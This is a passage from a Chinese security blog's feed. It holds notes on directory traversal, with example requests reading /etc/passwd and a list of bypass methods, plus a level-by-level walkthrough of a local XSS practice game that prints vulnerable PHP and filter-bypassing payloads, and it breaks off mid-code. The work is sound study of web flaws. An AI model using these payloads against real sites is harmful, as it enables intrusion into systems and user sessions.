</span>:不具任何权限,数字代号为“0”</span><br><span class="line">777 :所有权限</span><br><span class="line">[注]:3=1+2(wx) 5=4+1(rx)</span><br><span class="line"></span><br><span class="line">例如:</span><br><span class="line">chmod u-rwx xxx 取消xxx目录的用户“读写执行”权限</span><br><span class="line">chmod g-rwx xxx 取消xxx目录的组“读写执行”权限</span><br><span class="line">chmod 777 xxx 给xxx目录添加所有权限</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html">
<p>[TOC]</p>
<h2 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h2><h3 id="1、进入盘符"><a href="#1、进入盘符" class=
</summary>
<category term="命令" scheme="https://singlemindedt.github.io/tags/%E5%91%BD%E4%BB%A4/"/>
<category term="note" scheme="https://singlemindedt.github.io/tags/note/"/>
</entry>
<entry>
<title>目录穿越漏洞</title>
<link href="https://singlemindedt.github.io/2020/08/24/%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A%E6%BC%8F%E6%B4%9E/"/>
<id>https://singlemindedt.github.io/2020/08/24/目录穿越漏洞/</id>
<published>2020-08-24T01:42:05.000Z</published>
<updated>2020-08-24T04:53:15.868Z</updated>
<content type="html"><![CDATA[<h2 id="1-目录穿越"><a href="#1-目录穿越" class="headerlink" title="1. 目录穿越"></a>1. 目录穿越</h2><p>目录穿越的目的旨在访问存在于网站根目录外面的文件或目录。通过浏览应用,攻击者可以寻找存储在Web服务器上的其他文件的相对路径。攻击者若可访问位于应用服务器或其他后端文件系统的文件或目录,就可能出现路径穿越漏洞,攻击者通过<code>..\</code>向上回溯,从而访问服务器上任意文件。</p><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Unix操作系统上,<span class="string">../</span> 是一个标准的返回上一级路径的语法;</span><br><span class="line"></span><br><span class="line">Windows操作系统上, <span class="string">../</span> 和 <span class="string">..</span>\ 都是返回上一级的语句。</span><br></pre></td></tr></table></figure><h2 id="2-一般形式:"><a href="#2-一般形式:" class="headerlink" title="2. 一般形式:"></a>2. 一般形式:</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://***/go.action?file=..\..\etc\passwd</span><br><span class="line">https://www.*****.com/loadImage?filename=../../../etc/passwd</span><br></pre></td></tr></table></figure><h2 id="3-绕过方法:"><a href="#3-绕过方法:" class="headerlink" title="3. 绕过方法:"></a>3. 绕过方法:</h2><ol><li>绝对路径</li><li>双写<code>../</code>绕过</li><li>URL编码绕过</li><li>绝对路径+<code>../</code></li><li>%00截断文件后缀</li><li>Unicode编码绕过</li></ol><h2 id="4-防御:"><a href="#4-防御:" class="headerlink" title="4. 防御:"></a>4. 防御:</h2><ol><li>输入添加白名单</li><li>php.ini配置open_basedir</li><li>过滤关键字符<code>../</code></li></ol><h2 id="5-参考:"><a href="#5-参考:" class="headerlink" title="5. 参考:"></a>5. 参考:</h2><ol><li><p><a href="https://blog.csdn.net/angry_program/article/details/107855078" target="_blank" rel="noopener">目录穿越/遍历漏洞</a></p></li><li><p><a href="https://www.cnblogs.com/vo-ov/p/3745651.html" target="_blank" rel="noopener">网站安全(13) ——目录穿越漏洞(Directory Traversal)</a></p></li><li><p><a href="https://www.lstazl.com/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/" target="_blank" rel="noopener">任意文件读取漏洞</a></p></li><li><p><a href="http://wp.blkstone.me/2018/06/abusing-arbitrary-file-read/#5" target="_blank" rel="noopener">任意文件读取的深度利用</a></p></li><li><p><a href="https://www.cdxy.me/?p=554" target="_blank" rel="noopener">漏洞手记-任意文件读取</a></p></li><li><p><a href="https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system/" target="_blank" rel="noopener">目录遍历,文件包含和Proc文件系统</a></p></li><li><p><a href="http://xdxd.love/2016/05/23/一个任意文件读取漏洞分析/" target="_blank" rel="noopener">一个任意文件读取漏洞记录</a></p></li></ol>]]></content>
<summary type="html">
<h2 id="1-目录穿越"><a href="#1-目录穿越" class="headerlink" title="1. 目录穿越"></a>1. 目录穿越</h2><p>目录穿越的目的旨在访问存在于网站根目录外面的文件或目录。通过浏览应用,攻击者可以寻找存储在Web服务器上
</summary>
<category term="notes" scheme="https://singlemindedt.github.io/tags/notes/"/>
<category term="security" scheme="https://singlemindedt.github.io/tags/security/"/>
</entry>
<entry>
<title>CTFHub-wp</title>
<link href="https://singlemindedt.github.io/2020/08/12/CTFHub-wp/"/>
<id>https://singlemindedt.github.io/2020/08/12/CTFHub-wp/</id>
<published>2020-08-12T05:42:00.000Z</published>
<updated>2020-08-24T04:25:09.339Z</updated>
<content type="html"><![CDATA[<p>目录遍历</p><p>点击<code>点击开始寻找flag</code>,直接给出了目录,在flag_in_here/4/2下找到flag;</p><blockquote><p>该题目直接给了攻击者目录的访问权限,直接遍历查找即可;</p></blockquote>]]></content>
<summary type="html">
<p>目录遍历</p>
<p>点击<code>点击开始寻找flag</code>,直接给出了目录,在flag_in_here/4/2下找到flag;</p>
<blockquote>
<p>该题目直接给了攻击者目录的访问权限,直接遍历查找即可;</p>
</blockquote>
</summary>
<category term="wp" scheme="https://singlemindedt.github.io/tags/wp/"/>
<category term="CTF" scheme="https://singlemindedt.github.io/tags/CTF/"/>
</entry>
<entry>
<title>XSS小游戏</title>
<link href="https://singlemindedt.github.io/2020/08/04/XSS%E5%B0%8F%E6%B8%B8%E6%88%8F/"/>
<id>https://singlemindedt.github.io/2020/08/04/XSS小游戏/</id>
<published>2020-08-04T04:35:43.000Z</published>
<updated>2020-08-28T11:07:48.940Z</updated>
<content type="html"><![CDATA[<h3 id="第1关"><a href="#第1关" class="headerlink" title="第1关"></a>第1关</h3><p>输入变量被直接输出;</p><p>尝试:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>/xssgame-master/level1.php?name=<span class="xml"><span class="tag"><<span class="name">script</span>></span>alert(1)<span class="tag"></<span class="name">script</span>></span></span></span><br></pre></td></tr></table></figure><p>成功;</p><p>查看源码:</p><figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET方式将name的值传给`$str`变量,且未作任何过滤限制;</span><br></pre></td></tr></table></figure><h3 id="第2关"><a href="#第2关" class="headerlink" title="第2关"></a>第2关</h3><p>keyword变量通过<strong>GET</strong>方式传入,赋值给<code>$str</code>变量,然后带入到<code><h2></code>标签中和<code><input></code>标签;<code><h2></code>标签经过了<code>htmlspecialchars($str)</code>编码,<code><input></code>标签没有任何过滤,所以尝试对<code><input></code>标签进行闭合,来触发事件,使用<code>"></code>完成闭合。</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/xssgame-master/level2.php?keyword=xss"><script>alert(1)</script>//&submit=%E6%90%9C%E7%B4%A2</span></span><br></pre></td></tr></table></figure><p>查看源码:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><?php </span><br><span class="line">ini_set("display_errors", 0);</span><br><span class="line">$str = $_GET["keyword"];</span><br><span class="line">echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center></span><br><span class="line"><form action=level2.php method=GET></span><br><span class="line"><input name=keyword value="'.$str.'"></span><br><span class="line"><input type=submit name=submit value="搜索"/></span><br><span class="line"></form></span><br><span class="line"></center>';</span><br><span class="line">?></span><br></pre></td></tr></table></figure><h4 id="🐖:htmlspecialchars-定义和用法"><a href="#🐖:htmlspecialchars-定义和用法" class="headerlink" title="🐖:htmlspecialchars() 定义和用法"></a>🐖:<a href="http://yige.org/php/func_string_htmlspecialchars.php" target="_blank" rel="noopener">htmlspecialchars() 定义和用法</a></h4><p>htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。</p><p>预定义的字符是:</p><ul><li>& (和号)成为 <code>&amp</code>;</li><li>“ (双引号)成为 <code>&quot</code></li><li>‘ (单引号)成为<code>&#039</code> </li><li>< (小于)成为 <code>&lt</code></li><li>> (大于)成为 <code>&gt</code></li></ul><p>+++</p><p>经htmlspecialchars()处理的代码:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><title>第2关</title></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"><h1 align=center>第2关 窒息的操作</h1></span><br><span class="line"><h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相关的结果.</h2><center></span><br><span class="line"><form action=level2.php method=GET></span><br><span class="line"><input name=keyword value="<script>alert(1)</script>"></span><br><span class="line"><input type=submit name=submit value="搜索"/></span><br><span class="line"></form></span><br></pre></td></tr></table></figure><p>+++</p><h3 id="第3关"><a href="#第3关" class="headerlink" title="第3关"></a>第3关</h3><p>输入的变量被htmlspecialchars函数处理了,该函数默认的配置不过滤单引号,只有设置了:quotestyle选项为ENT_QUOTES才会过滤掉单引号。在这里这个函数处理的字符有<code>< > "</code> ,没有处理单引号,因此利用单引号和不含<code><></code>的函数构造payload,先通过单引号闭合value;</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/xssgame-master/level3.php?keyword=' onclick=alert(1) //</span></span><br><span class="line">http:<span class="comment">//127.0.0.1/xssgame-master/level3.php?keyword=' onclick='alert(1)'</span></span><br><span class="line"><span class="comment">//onclick 事件会在对象被点击时发生。</span></span><br><span class="line">http:<span class="comment">//127.0.0.1/xssgame-master/level3.php?keyword=' onmouseover=alert(1) x='</span></span><br><span class="line"><span class="comment">//onmouseover 事件会在鼠标指针移动到指定的元素上时发生。</span></span><br></pre></td></tr></table></figure><p>🐖:<a href="https://www.runoob.com/jsref/event-onmouseover.html" target="_blank" rel="noopener">onmouseover 事件</a></p><p>htmlspecialchars函数处理情况:</p><p><img src="https://s1.ax1x.com/2020/08/28/doN90I.png" alt="doN90I.png"></p><p>+++</p><p><img src="https://s1.ax1x.com/2020/08/28/doNpnA.png" alt="doNpnA.png"></p><p>+++</p><h3 id="第4关"><a href="#第4关" class="headerlink" title="第4关"></a>第4关</h3><p>过滤了尖括号,构造不包含这两个符号的payload,value的值与第三关有所差异,这里需要使用双引号用于闭合value标签;</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/xssgame-master/level3.php?keyword=" onclick=alert(1) //</span></span><br></pre></td></tr></table></figure><p>再点击一下输入框即可;</p><h3 id="第5关"><a href="#第5关" class="headerlink" title="第5关"></a>第5关</h3><p><code><script\on</code>被替换为<code><scr_ipt\o_n</code>;使用其他的函数构造payload;</p><p>🐖:<a href="https://www.w3school.com.cn/js/jsref_events.asp" target="_blank" rel="noopener">JavaScript 事件参考手册</a></p><p>由于JavaScript事件都含有on,所以这里暂时无法使用JavaScript事件来弹窗;</p><p>这里利用<code><a> 标签的 href 属性</code>:</p><p>🐖:<a href="https://www.w3school.com.cn/tags/att_a_href.asp" target="_blank" rel="noopener"><a> 标签的 href 属性</a></a></p><blockquote><p><a> 标签的 href 属性用于指定超链接目标的 URL。</a></p><p>href 属性的值可以是任何有效文档的相对或绝对 URL,包括片段标识符和 JavaScript 代码段。如果用户选择了 <a> 标签中的内容,那么浏览器会尝试检索并显示 href 属性指定的 URL 所表示的文档,或者执行 JavaScript 表达式、方法和函数的列表。</a></p></blockquote><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">"><a href="</span>javascrip<span class="variable">t:alert</span>(<span class="number">1</span>)<span class="comment">">xss</a></span></span><br></pre></td></tr></table></figure><p>查看源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = strtolower($_GET[<span class="string">"keyword"</span>]);</span><br><span class="line">$str2=str_replace(<span class="string">"<script"</span>,<span class="string">"<scr_ipt"</span>,$str);</span><br><span class="line">$str3=str_replace(<span class="string">"on"</span>,<span class="string">"o_n"</span>,$str2);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.htmlspecialchars($str).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level5.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.$str3.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>🐖: strtolower() 函数把字符串转换为小写;</p><p>相关:</p><table><thead><tr><th>函数</th><th>作用</th></tr></thead><tbody><tr><td>lcfirst()</td><td>把字符串中的首字符转换为小写</td></tr><tr><td>strtoupper()</td><td>把字符串转换为大写</td></tr><tr><td>ucfirst()</td><td>把字符串中的首字符转换为大写</td></tr><tr><td>ucwords()</td><td>把字符串中每个单词的首字符转换为大写</td></tr></tbody></table><h3 id="第6关"><a href="#第6关" class="headerlink" title="第6关"></a>第6关</h3><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = $_GET[<span class="string">"keyword"</span>];</span><br><span class="line">$str2=str_replace(<span class="string">"<script"</span>,<span class="string">"<scr_ipt"</span>,$str);</span><br><span class="line">$str3=str_replace(<span class="string">"on"</span>,<span class="string">"o_n"</span>,$str2);</span><br><span class="line">$str4=str_replace(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,$str3);</span><br><span class="line">$str5=str_replace(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,$str4);</span><br><span class="line">$str6=str_replace(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,$str5);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.htmlspecialchars($str).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level6.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.$str6.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>将”<script”、”on”、”src”、”data”、”href”都进行了替换,但未对大小写进行统一判定处理,可利用大小写绕过;</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">"><span class="tag"><<span class="name">Script</span>></span>alert(1)<span class="tag"></<span class="name">Script</span>></span></span><br></pre></td></tr></table></figure><h3 id="第7关"><a href="#第7关" class="headerlink" title="第7关"></a>第7关</h3><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str =strtolower( $_GET[<span class="string">"keyword"</span>]);</span><br><span class="line">$str2=str_replace(<span class="string">"script"</span>,<span class="string">""</span>,$str);</span><br><span class="line">$str3=str_replace(<span class="string">"on"</span>,<span class="string">""</span>,$str2);</span><br><span class="line">$str4=str_replace(<span class="string">"src"</span>,<span class="string">""</span>,$str3);</span><br><span class="line">$str5=str_replace(<span class="string">"data"</span>,<span class="string">""</span>,$str4);</span><br><span class="line">$str6=str_replace(<span class="string">"href"</span>,<span class="string">""</span>,$str5);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.htmlspecialchars($str).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level7.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.$str6.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>进行了小写转换,同时将敏感字符替换为空;</p><p>可以使用双写绕过;</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">"><span class="tag"><<span class="name">scscriptript</span>></span>alert(1)<span class="tag"></<span class="name">scscriptript</span>></span></span><br></pre></td></tr></table></figure><h3 id="第8关"><a href="#第8关" class="headerlink" title="第8关"></a>第8关</h3><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = strtolower($_GET[<span class="string">"keyword"</span>]);</span><br><span class="line">$str2=str_replace(<span class="string">"script"</span>,<span class="string">"scr_ipt"</span>,$str);</span><br><span class="line">$str3=str_replace(<span class="string">"on"</span>,<span class="string">"o_n"</span>,$str2);</span><br><span class="line">$str4=str_replace(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,$str3);</span><br><span class="line">$str5=str_replace(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,$str4);</span><br><span class="line">$str6=str_replace(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,$str5);</span><br><span class="line">$str7=str_replace(<span class="string">'"'</span>,<span class="string">'&quot'</span>,$str6);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level8.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.htmlspecialchars($str).<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=添加友情链接 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"> </span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="'</span>.$str7.<span class="string">'">友情链接</a></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>小写转换,敏感字符加<code>_</code>替换,同时对<code>"</code>进行实体化替换;</p><p>通过href属性将处理的值输出;</p><p>可使用编码绕过,利用Javascript伪协议后+其他编码</p><blockquote><p>如果用户选择了 <a> 标签中的内容,那么浏览器会尝试检索并显示 href 属性指定的 URL 所表示的文档,或者执行 JavaScript 表达式、方法和函数的列表。</a></p></blockquote><p>将敏感字符中的部分字母ASCII转URL编码:</p><figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">javascri</span>&<span class="selector-id">#x70</span>;<span class="selector-tag">t</span><span class="selector-pseudo">:alert()</span> <span class="selector-id">#HTML</span>实体编码(<span class="selector-tag">HEX</span>) </span><br><span class="line"><span class="selector-tag">javascri</span>&<span class="selector-id">#112</span>;<span class="selector-tag">t</span><span class="selector-pseudo">:alert()</span> <span class="selector-id">#HTML</span>实体编码(<span class="selector-tag">DEC</span>)</span><br></pre></td></tr></table></figure><p>🐖:</p><ul><li><p><a href="https://www.cnblogs.com/polk6/p/html-entity.html" target="_blank" rel="noopener">HTML Entity 字符实体(字符转义)</a></p></li><li><p><a href="https://www.w3school.com.cn/tags/html_ref_urlencode.html" target="_blank" rel="noopener">HTML URL 编码</a></p></li></ul><h3 id="第9关"><a href="#第9关" class="headerlink" title="第9关"></a>第9关</h3><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = strtolower($_GET[<span class="string">"keyword"</span>]);</span><br><span class="line">$str2=str_replace(<span class="string">"script"</span>,<span class="string">"scr_ipt"</span>,$str);</span><br><span class="line">$str3=str_replace(<span class="string">"on"</span>,<span class="string">"o_n"</span>,$str2);</span><br><span class="line">$str4=str_replace(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,$str3);</span><br><span class="line">$str5=str_replace(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,$str4);</span><br><span class="line">$str6=str_replace(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,$str5);</span><br><span class="line">$str7=str_replace(<span class="string">'"'</span>,<span class="string">'&quot'</span>,$str6);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level9.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.htmlspecialchars($str).<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=添加友情链接 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">false</span>===strpos($str7,<span class="string">'http://'</span>))</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>'</span>;</span><br><span class="line"> }</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="'</span>.$str7.<span class="string">'">友情链接</a></center>'</span>;</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><ul><li><p>字符转为小写,敏感字符替换;</p></li><li><p>strpos() 函数查找字符串在另一字符串中第一次出现的位置。</p></li></ul><blockquote><p><strong>注释:</strong>strpos() 函数对大小写敏感。</p><p><strong>返回字符串在另一字符串中第一次出现的位置,如果没有找到字符串则返回 FALSE。</strong></p><p><strong>注释:</strong>字符串位置从 0 开始,不是从 1 开始。</p></blockquote><ul><li>通过href属性将处理的值输出;</li></ul><p>需要使strpos()函数的返回结果不为false,即在keyword中需要包含<code>http://</code>;</p><p>可采用以下两种思路:</p><figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">注释:</span><br><span class="line">javascri&<span class="attr">#x70</span>;t:alert<span class="comment">()</span><span class="comment">//http://</span></span><br><span class="line">javascri&<span class="attr">#x70</span>;t:alert<span class="comment">()</span><span class="comment">/*http://*/</span></span><br></pre></td></tr></table></figure><figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">位置放在弹窗提示里</span><br><span class="line"><span class="selector-tag">javascri</span><span class="selector-tag">&</span><span class="selector-id">#x70</span>;<span class="selector-tag">t</span><span class="selector-pseudo">:alert('http</span>:<span class="comment">//')</span></span><br></pre></td></tr></table></figure><h3 id="第10关"><a href="#第10关" class="headerlink" title="第10关"></a>第10关</h3><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = $_GET[<span class="string">"keyword"</span>];</span><br><span class="line">$str11 = $_GET[<span class="string">"t_sort"</span>];</span><br><span class="line">$str22=str_replace(<span class="string">">"</span>,<span class="string">""</span>,$str11);</span><br><span class="line">$str33=str_replace(<span class="string">"<"</span>,<span class="string">""</span>,$str22);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.htmlspecialchars($str).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.$str33.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><ul><li>通过GET传值的有两个参数keyword和t_sort,t_sort字符中的<code><></code>被替换为空;</li><li>存在三个隐藏的input输入框</li></ul><p>可构造如下payload:</p><figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?t_sort=<span class="string">"type="</span><span class="built_in">text</span><span class="string">" onclick = "</span>alert(<span class="number">1</span>)</span><br></pre></td></tr></table></figure><h3 id="第11关"><a href="#第11关" class="headerlink" title="第11关"></a>第11关</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = $_GET[<span class="string">"keyword"</span>];</span><br><span class="line">$str00 = $_GET[<span class="string">"t_sort"</span>];</span><br><span class="line">$str11=$_SERVER[<span class="string">'HTTP_REFERER'</span>];</span><br><span class="line">$str22=str_replace(<span class="string">">"</span>,<span class="string">""</span>,$str11);</span><br><span class="line">$str33=str_replace(<span class="string">"<"</span>,<span class="string">""</span>,$str22);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.htmlspecialchars($str).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.htmlspecialchars($str00).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_ref" value="'</span>.$str33.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span 